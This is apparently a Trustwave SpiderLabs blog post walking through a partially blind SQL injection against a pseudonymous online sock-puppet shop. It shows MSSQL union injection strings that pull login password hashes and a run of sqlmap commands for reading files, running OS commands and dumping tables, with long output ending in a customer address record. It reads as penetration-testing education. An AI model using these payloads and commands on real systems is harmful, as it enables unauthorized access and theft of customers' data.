CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Request a Demo

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Request a Demo
Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

View All Trustwave Services
Solutions
BY INDUSTRY
BY REGULATION
BY TOPIC
Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
We reduce cyber risk and fortify organizations
Awards and Accolades
Recognition by analysts and media outlets
Trustwave SpiderLabs Team
Global researchers, ethical hackers, and responders
Trustwave Fusion Security Operations Platform
Unprecedented security visibility and control
Trustwave Security Colony
Access to cybersecurity threat protection resources
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
Register
Login
Resources
BLOGS
UPCOMING
MEDIA & ASSETS
NOTICES
HELP
SpiderLabs Blog

You Injected What? Where?

March 05, 2013 10 minutes read Theresa

While harder to detect, there are still some instances of websites exploitable via partially blind SQL injection. For the purposes of this blog we're going to call the website AngryGrrl's Sock Puppets. It sells a variety of sock puppets of different media types. There is an extensive catalog even. Who knew?

On the main page of the website the search function of the database was not properly setup. By typing in ' union select master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;-- and hitting the submit button the follow page popped up on the webpage.

 

BSL_8626_32935ae3-1ffe-431b-9c26-2639b82965dd

 

The nvarchar value'0x0100a95820034b6b6c41339a66ed558f99752abe8f9d8fd71d75' can be cracked to reveal the plaintext password of the union hashed password for the "sa" account. But what happens if you don't get the "sa" account and password?

By going back to the original webpage and typing in ' union select @@version;-- and hitting submit a different page pops up revealing theMicrosoft SQL server version and extra goodies.

 

7868_0ca73d6a-9752-4fb4-8971-31cd61d6b447

 

Both of the resulting webpages of verbosity goodness reveal a partial blind SQL injection that can be used to access the internal database of AngryGrrl's Sock Puppets. Perhaps cardholder data, maybe personally identifiable information, or just the inventory of sock puppets could be had for a lot of time, but little effort.

In the instance of just finding the Microsoft SQL server version, the SQL map project is the best bet for grabbing the goods. A full comprehensive look at SQL map can be found at https-//github.com/sqlmapproject/sqlmap/wiki/Usage. Once it's installed you will need to have a few other pieces of the puzzle to continue. Using either Burp Suite or OWASP's ZAP web proxy, get a copy of the injection point via stacked query: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=from the web page request. This will be copied into the sqlmap.conf file for ease of use and accuracy. In this case, it will be calledsqlmap-sock.conf.

$./sqlmap.py -csqlmap- sock.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo'

sqlmap/1.0-dev-e61c4c2 - automatic SQLinjection and database takeover tool
http://sqlmap.org

[!] legal disclaimer:Usage of sqlmap for attacking targets without prior mutual consent is illegal.It is the end user's responsibility to obey all applicable local, state andfederal laws. Developers assume no liability and are not responsible for anymisuse or damage caused by this program

[*] starting at 10:17:53
[10:17:53] [INFO] testingconnection to the target url
[10:17:56] [INFO] testingif the url is stable, wait a few seconds
[10:17:59] [WARNING] urlis not stable, sqlmap will base the page comparison on a sequence matcher. Ifno dynamic nor injectable parameters are detected, or in case of junk results,refer to user's manual paragraph 'Page comparison' and provide a string orregular expression to match on
how do you want toproceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] [10:18:16] [INFO]heuristic test shows that POST parameter 'ctl00$ucDiscipleSelect$tbPromo' mightbe injectable (possible DBMS: Microsoft SQL Server)
[10:18:16] [INFO] testingfor SQL injection on POST parameter 'ctl00$ucDiscipleSelect$tbPromo
[10:18:16] [INFO] testing'AND boolean-based blind - WHERE or HAVING clause'
[10:18:17] [WARNING]reflective value(s) found and filtering out
[10:18:34] [INFO] testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[10:18:38] [INFO] testing'Microsoft SQL Server/Sybase stacked queries'
[10:18:51] [INFO] POSTparameter 'ctl00$ucDiscipleSelect$tbPromo' is 'Microsoft SQL Server/Sybasestacked queries' injectable
[10:18:51] [INFO] testing'Microsoft SQL Server/Sybase time-based blind'
[10:19:04] [INFO] POSTparameter 'ctl00$ucDiscipleSelect$tbPromo' is 'Microsoft SQL Server/Sybasetime-based blind' injectable
[10:19:04] [INFO] testing'Generic UNION query (NULL) - 1 to 20 columns'
[10:19:04] [INFO]automatically extending ranges for UNION query injection technique tests asthere is at least one other potential injection technique found
[10:19:19] [INFO] targeturl appears to be UNION injectable with 1 columns
[10:19:21] [INFO]checking if the injection point on POST parameter 'ctl00$ucDiscipleSelect$tbPromo'is a false positive
POST parameter'ctl00$ucDiscipleSelect$tbPromo' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] y
sqlmap identified thefollowing injection points with a total of 53 HTTP(s) requests:

---

Place: POST
Parameter:ctl00$ucDiscipleSelect$tbPromo
Type: stacked queries
Title: Microsoft SQL Server/Sybase stackedqueries
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

Type: AND/OR time-basedblind
Title: Microsoft SQL Server/Sybasetime-based blind
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

All of which delivers the following information:

---

[10:22:16] [INFO] the back-end DBMS is Microsoft SQLServer
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727,Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005

[10:22:16] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 26 times
[10:22:16] [INFO] fetcheddata logged to text files under'/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

[*] shutting down at10:22:16

Since the database has been verified, let's try for the current users:

$ ./sqlmap.py -c sqlmap-sock.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo'--current-user

sqlmap/1.0-dev-e61c4c2 - automatic SQLinjection and database takeover tool
http://sqlmap.org

[!] legal disclaimer:Usage of sqlmap for attacking targets without prior mutual consent is illegal.It is the end user's responsibility to obey all applicable local, state andfederal laws. Developers assume no liability and are not responsible for anymisuse or damage caused by this program

[*] starting at 10:36:38
[10:36:39] [INFO] testingconnection to the target url
sqlmap identified thefollowing injection points with a total of 0 HTTP(s) requests:

---

Place: POST
Parameter:ctl00$ucDiscipleSelect$tbPromo
Type: stacked queries
Title: Microsoft SQL Server/Sybase stackedqueries
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybasetime-based blind
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

[10:43:49] [INFO] the back-end DBMS is Microsoft SQLServer
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727,Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[10:43:49] [INFO] fetching current user
[10:43:49] [INFO] resumed: webstore
current user: 'webstore'
[10:43:49] [INFO] testing if current user is DBA
[10:43:49] [WARNING] time-based comparison needs largerstatistical model. Making a few dummy requests, please wait..
current user is DBA: False
[10:43:58] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 1 times
[10:43:58] [INFO] fetched data logged to textfiles under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

We have the current user, who is unfortunately not the Database Administrator. But let's see what kind of access they do have…

$ ./sqlmap.py -c sqlmap-sock.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo' --file-read 'c:\webroot\SockPuppet\App_Code\GenericDataAccess.cs'

sqlmap/1.0-dev-e61c4c2 - automatic SQLinjection and database takeover tool
http://sqlmap.org

[!] legal disclaimer:Usage of sqlmap for attacking targets without prior mutual consent is illegal.It is the end user's responsibility to obey all applicable local, state andfederal laws. Developers assume no liability and are not responsible for anymisuse or damage caused by this program

[*] starting at 10:45:48
[10:45:48] [INFO] testingconnection to the target url
sqlmap identified thefollowing injection points with a total of 0 HTTP(s) requests:

---

Place: POST
Parameter:ctl00$ucDiscipleSelect$tbPromo
Type: stacked queries
Title: Microsoft SQL Server/Sybase stackedqueries
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

[10:45:49] [INFO] the back-end DBMS is Microsoft SQLServer
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727,Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[10:45:49] [INFO] fetching file: 'c:/webroot/Sock_Puppets/App_Code/GenericDataAccess.cs'
[10:45:49] [WARNING] time-based comparison needs largerstatistical model. Making a few dummy requests, please wait..
[10:45:59] [WARNING] it is very important not to stressthe network adapter's bandwidth during usage of time-based queries
do you want sqlmap to try to optimize value(s) for DBMSdelay responses (option '--time-sec')? [Y/n] y
[10:47:09] [INFO] retrieved:
c:/webroot/SockPuppet/App_Code/GenericDataAccess.cs filesaved to: 'No data retrieved'
[10:47:17][INFO] fetched data logged to text files under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

Bummer. Let's try something else.

$ ./sqlmap.py -c sqlmap-sock.conf --dbms 'Microsoft SQL Server 2005'-p 'ctl00%24ucDiscipleSelect%24tbPromo' --os-cmd ver

[11:28:09] [INFO] theback-end DBMS is Microsoft SQL Server
web server operatingsystem: Windows Vista
web applicationtechnology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MicrosoftSQL Server 2005
[11:28:09] [INFO]fetching database users password hashes
[11:28:09] [INFO]fetching database users
[11:28:09] [INFO]fetching number of database users
[11:28:09] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
[11:28:22] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
do you want sqlmap to tryto optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:29:26] [INFO] adjusting time delay to 2seconds due to good response times

$ ./sqlmap.py -c sqlmap-scb.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo'--current-user --passwords

…snip…

[12:17:59] [INFO] theback-end DBMS is Microsoft SQL Server
web server operatingsystem: Windows Vista
web applicationtechnology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MicrosoftSQL Server 2005
[12:17:59] [INFO]fetching current user
[12:17:59] [INFO]resumed: webstore
current user: 'webstore'
[12:17:59] [INFO]fetching database users password hashes
[12:17:59] [INFO]fetching database users
[12:17:59] [INFO]fetching number of database users
[12:17:59] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
[12:18:30] [CRITICAL]there is considerable lagging in connection response(s). Please use as highvalue for option '--time-sec' as possible (e.g. 10 or more)
[12:18:31] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
[12:18:51] [WARNING] incase of continuous data retrieval problems you are advised to try a switch'--no-cast' and/or switch '--hex'
[12:18:51] [CRITICAL]unable to retrieve the number of database users
[12:18:51] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 1 times
[12:18:51] [INFO] fetcheddata logged to text files under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'
[*] shutting down at12:18:51

$ ./sqlmap.py -c sqlmap-scb.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo'--current-user --privileges

…snip…

[16:39:25] [INFO] theback-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727,Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[16:39:25] [INFO] fetching tables for database:SOCKPUPPETS
[16:39:25] [INFO] fetching number of tables for database'SOCKPUPPETS'
[16:39:25] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
[16:39:37] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
do you want sqlmap to tryto optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[16:40:03] [INFO]adjusting time delay to 4 seconds due to good response times
[16:40:20] [ERROR]invalid character detected. retrying..
[16:40:20] [WARNING]increasing time delay to 5 seconds
60
[16:40:58] [INFO] retrieved: dbo.affil
[16:45:30] [ERROR]invalid character detected. retrying..
[16:45:30] [WARNING]increasing time delay to 6 seconds
iates
[16:47:57] [INFO] retrieved:dbo.commissionspaid
[16:57:06] [INFO] retrieved:dbo.COREMETRICS_CUSTO
[17:06:03] [ERROR]invalid character detected. retrying..
[17:06:03] [WARNING]increasing time delay to 7 seconds
[17:07:01] [ERROR]invalid character detected. retrying..
[17:07:01] [WARNING]increasing time delay to 8 seconds
[17:07:56] [ERROR]invalid character detected. retrying..
[17:07:56] [WARNING]increasing time delay to 9 seconds
[17:09:04] [ERROR] unableto properly validate last character value ('q')..
q

…snip…

[17:33:26] [INFO] retrieved:dbo.COREMETRICS_CUSTO
[17:38:13] [ERROR]invalid character detected. retrying..
[17:38:13] [WARNING]increasing time delay to 6 seconds
[17:38:53] [ERROR]invalid character detected. retrying..
[17:38:53] [WARNING]increasing time delay to 7 seconds
[17:39:37] [ERROR]invalid character detected. retrying..
[17:39:37] [WARNING]increasing time delay to 8 seconds
[17:40:19] [ERROR]invalid character detected. retrying..
[17:40:19] [WARNING]increasing time delay to 9 seconds
M_SOCK_PUPPETS
[17:45:27] [ERROR] unableto properly validate last character value ('T')..
T
[17:45:34] [INFO] retrieved:dbo.COREMETRICS_CUSTOM_SOCK_PUPPETS
[17:50:12] [INFO] retrieved: dbo.COREMETRICS_CUSTOM_SOCK_PUPPETS_TEST
[17:55:28] [ERROR]invalid character detected. retrying..
[17:55:28] [WARNING]increasing time delay to 5 seconds
01
[17:57:04] [INFO] retrieved: dbo.Customer_Address
[18:04:42] [INFO] retrieved: dbo.payment_type
[18:10:01] [ERROR]invalid character detected. retrying..
[18:10:01] [WARNING]increasing time delay to 6 seconds
rties
[18:12:53] [INFO] retrieved:dbo.ECOM_ITEMKEYWO
[18:20:18] [ERROR]invalid character detected. retrying..
[18:20:18] [WARNING]increasing time delay to 7 seconds
RDS
[18:47:41] [INFO] retrieved:dbo.ECOM_TEMP_CATCODES

…snip…

Looks like some database names have popped. Let's take a closer look at one of them.

$ ./sqlmap.py -c sqlmap-scb.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo' --dump -T SOCKPUPPETS

…snip…

[20:49:54] [INFO] theback-end DBMS is Microsoft SQL Server
web server operatingsystem: Windows Vista
web applicationtechnology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MicrosoftSQL Server 2005
[20:49:54] [WARNING]missing database parameter. sqlmap is going to use the current database toenumerate table(s) entries
[20:49:54] [INFO]fetching current database
[20:49:54] [INFO] resumed:!
[20:49:54] [INFO]fetching columns for table 'SOCKPUPPETS' in database '!'
[20:49:54] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
[20:50:08] [CRITICAL]there is considerable lagging in connection response(s). Please use as highvalue for option '--time-sec' as possible (e.g. 10 or more)
[20:50:17] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
4
[20:50:26] [INFO] retrieved:
[20:50:34] [WARNING] incase of continuous data retrieval problems you are advised to try a switch'--no-cast' and/or switch '--hex'
[20:50:34] [INFO]retrieved:
[20:50:43] [INFO]retrieved:
[20:50:50] [INFO]retrieved:
[20:50:58] [ERROR] unableto retrieve the columns for any table in database '!'
do you want to use commoncolumn existence check? [y/N/q] y
[20:51:35] [INFO]checking column existence using items from '/home/theresa/sqlmap-dev/txt/common-columns.txt'
[20:51:35] [INFO] addingwords used on web page to the check list
[20:55:06] [INFO]retrieved:log
[21:00:22] [INFO]retrieved:html_id
[21:05:13] [INFO]retrieved: price
[21:05:26] [INFO]retrieved: bot_id
[21:05:52] [INFO]retrieved:community
[21:06:06] [INFO]retrieved: list
[21:06:26] [INFO]retrieved: sub_image5
[21:06:42] [INFO]retrieved: sale_limit
[21:07:02] [INFO]retrieved: module_name
[21:07:39] [INFO]retrieved: main_image
[21:07:54] [INFO]retrieved: sub_large_image5
[21:08:13] [INFO]retrieved: main_list_comment
[21:09:25] [INFO]retrieved: created_at
[21:13:29] [INFO]retrieved: idclassificatore
[21:14:47] [INFO]retrieved: arcade
[21:15:26] [INFO]retrieved: tagname
[21:16:39] [INFO]retrieved: blogid
[21:17:02] [INFO]retrieved: downloads
[21:17:24] [INFO]retrieved: postdatetime
[21:17:38] [INFO]retrieved: pro_id
[21:18:02] [INFO]retrieved: does
[21:18:21] [INFO]retrieved: risks
[21:18:41] [INFO]retrieved: dakota
[21:18:58] [INFO]retrieved: northwest
[21:19:16] [INFO]retrieved: ceu
[21:19:29] [INFO]retrieved: log
[21:20:16] [INFO]retrieved: designed
[21:20:30] [INFO]retrieved: yukon
[21:21:20] [INFO]fetching entries for table 'SOCKPUPPETS' in database '!'
[21:21:20] [INFO]fetching number of entries for table 'SOCKPUPPETS' in database '!'
[21:21:20] [INFO]retrieved:
[21:21:23] [WARNING]unable to retrieve the number of entries for table 'SOCKPUPPETS' in database'!'
[21:21:23] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 2681 times
[21:21:23] [INFO] fetcheddata logged to text files under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

[*] shutting down at21:21:23

twarnock@megalon:~/sqlmap-dev$ ./sqlmap.py -c sqlmap-scb.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo' --dump -Tdbo.Customer_Address -D SOCKPUPPETS

…snip…

[21:38:19] [INFO] theback-end DBMS is Microsoft SQL Server
web server operatingsystem: Windows Vista
web applicationtechnology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MicrosoftSQL Server 2005
[21:38:19] [INFO]fetching columns for table 'Customer_Address' in database 'SOCKPUPPETS'
[21:38:19] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
do you want sqlmap to tryto optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[21:38:52] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
[21:39:06] [ERROR]invalid character detected. retrying..
[21:39:06] [WARNING]increasing time delay to 6 seconds
6
[21:39:37] [INFO]retrieved: C
[21:40:29] [ERROR]invalid character detected. retrying..
[21:40:29] [WARNING]increasing time delay to 7 seconds
UST_NO
[21:44:01] [INFO]retrieved: NA
[21:45:40] [ERROR]invalid character detected. retrying..
[21:45:40] [WARNING]increasing time delay to 8 seconds
ME_FULL
[21:50:26] [ERROR]invalid character detected. retrying..
[21:50:26] [WARNING]increasing time delay to 9 seconds
ONTH
[21:53:32] [INFO]retrieved: ST
[21:55:34] [ERROR]invalid character detected. retrying..
[21:55:34] [WARNING]increasing time delay to 10 seconds
REET
[22:02:34] [INFO]retrieved:CI
[22:03:57] [ERROR]invalid character detected. retrying..
[22:03:57] [WARNING]increasing time delay to 6 seconds
[22:04:44] [ERROR]invalid character detected. retrying..
[22:04:44] [WARNING]increasing time delay to 7 seconds
TY
[22:07:28] [ERROR] unableto properly validate last character value ('S')..
S
[22:08:01] [ERROR]invalid character detected. retrying..
[22:08:01] [WARNING]increasing time delay to 6 seconds
[22:08:38] [ERROR]invalid character detected. retrying..
[22:08:38] [WARNING]increasing time delay to 7 seconds
[22:09:18] [ERROR]invalid character detected. retrying..
[22:09:18] [WARNING]increasing time delay to 8 seconds
T
[22:10:58] [ERROR]invalid character detected. retrying..
[22:10:58] [WARNING]increasing time delay to 9 seconds
[22:11:43] [ERROR]invalid character detected. retrying..
[22:11:43] [WARNING]increasing time delay to 10 seconds
[22:12:19] [ERROR] unableto properly validate last character value ('A')..
A
[22:12:54] [ERROR]invalid character detected. retrying..
[22:12:54] [WARNING]increasing time delay to 6 seconds
T
[22:14:50] [ERROR]invalid character detected. retrying..
[22:14:50] [WARNING]increasing time delay to 7 seconds
[22:15:29] [ERROR] invalidcharacter detected. retrying..
[22:15:29] [WARNING]increasing time delay to 8 seconds
[22:16:03] [ERROR]invalid character detected. retrying..
[22:16:03] [WARNING]increasing time delay to 9 seconds
[22:16:54] [ERROR]invalid character detected. retrying..
[22:16:54] [WARNING]increasing time delay to 10 seconds
[22:17:39] [ERROR] unableto properly validate last character value ('E')..
E
[22:30:35] [INFO]retrieved: ZIP
[22:34:59] [INFO]fetching entries for table 'Customer_Address' in database 'SOCKPUPPET'[22:34:59] [INFO]fetching number of entries for table 'Customer_Address' in database 'SOCKPUPPET'
[22:34:59] [INFO]retrieved: 1
[22:35:10] [INFO]fetching number of distinct values for column 'CUST_NO'
[22:35:10] [INFO]retrieved: 1
[22:35:23] [INFO] usingcolumn 'CUST_NO' as a pivot for retrieving row data
[22:35:23] [INFO]retrieved:008675309
[22:39:45] [INFO]retrieved: DEREK_HALE
[22:40:31] [ERROR]invalid character detected. retrying..
[22:40:31] [WARNING]increasing time delay to 6 seconds
11 BEACON WAY
[22:41:14] [INFO]retrieved: BEACON HILLS
[22:43:13] [INFO]retrieved: CA
[22:43:37] [INFO]retrieved: 92677
[22:43:40] [WARNING] incase of continuous data retrieval problems you are advised to try a switch'--no-cast' and/or switch '--hex'
[22:43:40] [INFO]retrieved:
[22:43:44] [INFO]analyzing table dump for possible password hashes
Database: SOCKPUPPET
Table: dbo.Customer_Address
[1 entry]

+------------+--------------+--------------+---------------+---------------+----------------+

| CUST_NO | NAME_FULL | STREET | CITY | STATE | ZIP |

+------------+--------------+--------------+---------------+---------------+----------------+

| 008675309 | DEREK_HALE | 11 BEACON WAY | BEACON HILLS |CA | 92677 |

+------------+--------------+--------------+---------------+---------------+----------------+

[22:43:44] [INFO] table 'SOCKPUPPET.dbo.Customer_Address'dumped to CSV file '/home/twarnock/sqlmap-dev/output/www.angrygrrlssockpuppets.com/dump/SOCKPUPPET/Customer_Address.csv'
[22:43:44] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 20 times
[22:43:44] [INFO] fetcheddata logged to text files under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

[*] shutting down at22:43:44

And there it is, the customer database with the first row listed out for your viewing pleasure. Further SQL injections might produce actual card holder data, items for sale, and various other goodies depending on the database.

Latest SpiderLabs Blogs

EDR – The Multi-Tool of Security Defenses

This is Part 8 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here.

Read More

The Invisible Battleground: Essentials of EASM

Know your enemy – inside and out. External Attack Surface Management tools are an effective way to understand externally facing threats and help plan cyber defenses accordingly. Let’s discuss what...

Read More

Fake Dialog Boxes to Make Malware More Convincing

Let’s explore how SpiderLabs created and incorporated user prompts, specifically Windows dialog boxes into its malware loader to make it more convincing to phishing targets during a Red Team...

Read More